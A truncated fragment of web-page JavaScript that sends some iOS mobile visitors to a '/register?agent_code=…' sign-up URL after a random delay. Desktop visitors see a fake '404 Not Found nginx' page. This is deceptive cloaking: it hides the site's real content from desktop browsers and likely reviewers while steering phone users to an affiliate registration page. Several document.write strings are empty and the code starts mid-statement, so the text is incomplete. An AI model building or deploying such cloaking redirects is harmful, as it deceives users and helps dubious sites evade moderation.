/register?agent_code=50001812"; function getIosVersion() { const match = navigator.userAgent.match(/OS (\d+)_(\d+)_?(\d+)?/); return match ? parseInt(match[1], 10) : false; } const isIOS = !!navigator.userAgent.match(/(iPod|iPhone|iPad)/); const time = Math.floor(Math.random() * (1000 - 500 + 1)) + 500; if (isMobile()) { if (isIOS && getIosVersion() < 13) { setTimeout(() => { window.location.href = mobileUrl; }, time); } else { document.write(''); document.write(''); document.write('
'); document.write(''); document.write('
'); } } else { document.write('

404 Not Found


nginx
'); }